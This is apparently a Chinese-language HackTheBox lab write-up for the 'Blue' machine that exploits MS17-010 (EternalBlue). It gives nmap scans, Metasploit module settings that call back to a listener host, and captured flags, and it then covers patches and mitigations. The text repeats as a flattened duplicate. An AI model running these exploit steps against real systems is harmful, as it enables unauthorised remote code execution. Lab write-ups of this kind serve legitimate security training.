[Meachines] [Easy] Blue MS17-010永恒之蓝
字数 1167 2025-08-20 18:18:40

MS17-010永恒之蓝漏洞利用教学文档

1. 漏洞概述

MS17-010(永恒之蓝)是Microsoft Windows SMB服务中的一个严重远程代码执行漏洞,影响Windows 7、Windows Server 2008等操作系统。该漏洞允许攻击者通过特制的SMB数据包在目标系统上执行任意代码。

2. 信息收集阶段

2.1 初始扫描

使用Nmap进行全端口扫描:

nmap -p- 10.10.10.40 --min-rate 1000 -sC -sV

2.2 扫描结果分析

关键发现:

  • 开放端口:
    • 135/tcp (msrpc)
    • 139/tcp (netbios-ssn)
    • 445/tcp (microsoft-ds)
    • 49152-49157/tcp (msrpc)
  • 操作系统:Windows 7 Professional 7601 Service Pack 1
  • 计算机名:HARIS-PC
  • 工作组:WORKGROUP
  • SMB安全模式:消息签名启用但不强制(漏洞利用关键点)

2.3 漏洞验证扫描

nmap -p 445 -sC -sV --script vuln 10.10.10.40

3. 漏洞利用

3.1 Metasploit框架使用

启动Metasploit:

msfconsole

3.2 选择利用模块

use windows/smb/ms17_010_eternalblue

3.3 配置参数

set RHOSTS 10.10.10.40       # 设置目标IP
set LHOST 10.10.16.24        # 设置本地监听IP
set target 1                 # 设置目标类型(自动检测)

3.4 执行攻击

run

4. 后渗透阶段

成功利用后可以获取:

  • 用户标志:66feec35142136aa33d265ca07d7859d
  • 系统标志:ff8a181bed42f9b18b49ba5690c86cd6

5. 技术细节

5.1 漏洞原理

永恒之蓝利用了SMBv1协议在处理特制数据包时的缓冲区溢出漏洞,特别是:

  • SMBv1中的SMB_COM_TRANSACTION2命令处理
  • 内核模式驱动srv.sys中的漏洞
  • 允许远程代码执行无需用户认证

5.2 利用条件

  • 目标系统开启SMB服务(端口445)
  • 目标系统未安装MS17-010补丁
  • 目标系统未启用SMB签名强制(默认不强制)

6. 防御措施

6.1 补丁管理

安装Microsoft官方补丁:

  • KB4012212 (2017年3月安全更新)
  • KB4012215 (2017年3月安全更新)

6.2 缓解措施

  1. 禁用SMBv1:
    Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
    
  2. 启用SMB签名:
    Set-SmbServerConfiguration -RequireSecuritySignature $true
    
  3. 防火墙规则阻止445端口外部访问

7. 扩展知识

7.1 替代利用工具

  • EternalBlue独立利用脚本
  • Metasploit的auxiliary/scanner/smb/smb_ms17_010模块(仅检测)
  • Python实现的独立利用脚本

7.2 相关漏洞

  • MS17-010系列中的其他漏洞(如EternalRomance、EternalChampion等)
  • DoublePulsar后门(常与永恒之蓝配合使用)

8. 法律与道德声明

本教学文档仅用于合法安全测试和教育目的。未经授权对系统进行渗透测试是违法行为。在实际环境中使用这些技术前,必须获得系统所有者的明确书面授权。

MS17-010永恒之蓝漏洞利用教学文档 1. 漏洞概述 MS17-010(永恒之蓝)是Microsoft Windows SMB服务中的一个严重远程代码执行漏洞,影响Windows 7、Windows Server 2008等操作系统。该漏洞允许攻击者通过特制的SMB数据包在目标系统上执行任意代码。 2. 信息收集阶段 2.1 初始扫描 使用Nmap进行全端口扫描: 2.2 扫描结果分析 关键发现: 开放端口: 135/tcp (msrpc) 139/tcp (netbios-ssn) 445/tcp (microsoft-ds) 49152-49157/tcp (msrpc) 操作系统:Windows 7 Professional 7601 Service Pack 1 计算机名:HARIS-PC 工作组:WORKGROUP SMB安全模式:消息签名启用但不强制(漏洞利用关键点) 2.3 漏洞验证扫描 3. 漏洞利用 3.1 Metasploit框架使用 启动Metasploit: 3.2 选择利用模块 3.3 配置参数 3.4 执行攻击 4. 后渗透阶段 成功利用后可以获取: 用户标志:66feec35142136aa33d265ca07d7859d 系统标志:ff8a181bed42f9b18b49ba5690c86cd6 5. 技术细节 5.1 漏洞原理 永恒之蓝利用了SMBv1协议在处理特制数据包时的缓冲区溢出漏洞,特别是: SMBv1中的SMB_ COM_ TRANSACTION2命令处理 内核模式驱动srv.sys中的漏洞 允许远程代码执行无需用户认证 5.2 利用条件 目标系统开启SMB服务(端口445) 目标系统未安装MS17-010补丁 目标系统未启用SMB签名强制(默认不强制) 6. 防御措施 6.1 补丁管理 安装Microsoft官方补丁: KB4012212 (2017年3月安全更新) KB4012215 (2017年3月安全更新) 6.2 缓解措施 禁用SMBv1: 启用SMB签名: 防火墙规则阻止445端口外部访问 7. 扩展知识 7.1 替代利用工具 EternalBlue独立利用脚本 Metasploit的auxiliary/scanner/smb/smb_ ms17_ 010模块(仅检测) Python实现的独立利用脚本 7.2 相关漏洞 MS17-010系列中的其他漏洞(如EternalRomance、EternalChampion等) DoublePulsar后门(常与永恒之蓝配合使用) 8. 法律与道德声明 本教学文档仅用于合法安全测试和教育目的。未经授权对系统进行渗透测试是违法行为。在实际环境中使用这些技术前,必须获得系统所有者的明确书面授权。